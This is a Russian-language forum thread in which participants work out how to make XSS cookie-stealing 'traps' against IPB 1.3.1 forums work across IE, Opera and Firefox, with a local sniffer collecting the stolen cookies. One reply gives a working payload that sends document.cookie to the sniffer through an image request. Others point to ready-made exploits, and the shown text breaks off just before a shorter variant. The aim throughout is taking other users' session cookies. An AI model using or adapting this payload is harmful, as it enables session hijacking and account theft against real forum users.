Xss в зависимости от браузера на примере Ipb
 

Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка.

1) Установил IPB локально
2) Установил локально сниффер

подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0

Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость.

Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим.

Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало.

Создал тестовую хтмл, с текстом
Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие

Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?

----> как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?

Учись и больше читай.

такие советы я сам регулярно раздаю, я понимаю что не все скрипты одинаково работают, и соответсвенно разные приколы с приватностью и прочим.

Короче кто может детальной обьяснить, буду очень благодарен

---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.

ЗЫ, подчисти ящик, а то он ПМ больше не принимает.

Grtzzz.

то есть ты хочешь сказать что (выбрать нужное):

1) на данный момент нет готовых кодов для кражи кукисов из оперы/фаера
2) это не возможно
3) возможно, но надо рыть спецификацию

Там есть разница в синтаксисе.

Готовые коды есть в Уязвимостях форумов.

Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.

White Jordan, во всех его воплощениях, тоже неплохо описывал.

В гугле я тоже много чего читал по этому поводу.

В приведённом тобой коде первые две строчки лишние.

из тех что в теме "уязвимости IPB" у меня не один не сработал в Фаере/Опере


линк не затруднит?


В гугле я нашел кое-что, но не по теме, а о других различиях; а приведенный пример, это лишь отладка, я пытался выяснить что, когда и как работает с его помощью. Но сейчас попробую без первых двух

Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код

вот зараза...с первыми двумя строчками не работает, а сама по себе отлично. Проверено в Опере, Фаере. Надо сейчас только раздуплиться как сделать в кодах это, вы тоже подсказывайте, а то у меня ступор может начаться :)

Зачем такой длинный код?
Достаточно такого: